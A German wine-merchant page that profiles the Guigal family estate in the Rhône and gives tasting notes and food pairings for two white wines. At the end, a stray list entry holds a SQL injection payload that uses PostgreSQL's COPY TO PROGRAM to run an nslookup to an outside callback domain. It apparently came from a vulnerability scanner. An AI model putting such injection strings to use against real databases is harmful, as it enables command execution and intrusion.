E.Guigal lebende Historie von der Rhône

Die Weinkritiker geben sich ehrfurchtsvoll: Der beste Weinmacher der Welt, sagen die französischen Journalisten; hundert Punkte, die höchste Punktzahl verkündet der amerikanische Wein- Trendsetter Robert M. Parker jr. Marcel Guigal, dem diese Ehre gilt, bleibt gelassen. Heute sei er ein bewunderter Mann, morgen sei es ein anderer. Dennoch, er kennt seine Verdienste. Er weiß, dass er es gewesen ist, der die Rhône aus dem Schatten von Bordeaux und Burgund geführt hat. Der Familienbetrieb, 1946 vom Vater Etienne gegründet, wird jetzt in der dritten Generation von Sohn Philippe mitgeführt. Neben seinen Spitzenweinen legt die Familie Guigal besonderen Wert auf schmackhafte Alltagsweine, mit gutem Preis- / Genussverhältnis.

Mit seiner leuchtend strohgelben Robe verführt dieser Côtes-du Rhône Blanc dank seines Duftes von Holunderblüten, Birnen und Melonen. Mit mineralischer Frische und schönem Extrakt entzückt er am Gaumen.

Trinken Sie diesen Weißwein während der nächsten drei Jahre zu pochierter Poulardenbrust mit Schalottensauce oder überbackenem Ziegenkäse.

weiterlesen…

Dieser Hermitage Blanc präsentiert sich mit einem intensivem Duft nach Aprikosen und Ananas, am Gaumen würzig und komplex und schöner und Mineralität Die Aromen nach Akazienblüten und Toast harmonieren prächtig mit der dezenten Barrique-Note.

Wir empfehlen diesen Wein während der nächsten 8 Jahre zu Perlhuhn mit Ananaskraut oder Zander unter der Kartoffelkruste.

Link zum Weiterlesen…

  • testing
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-10756.73502.d865c.1.bxss.me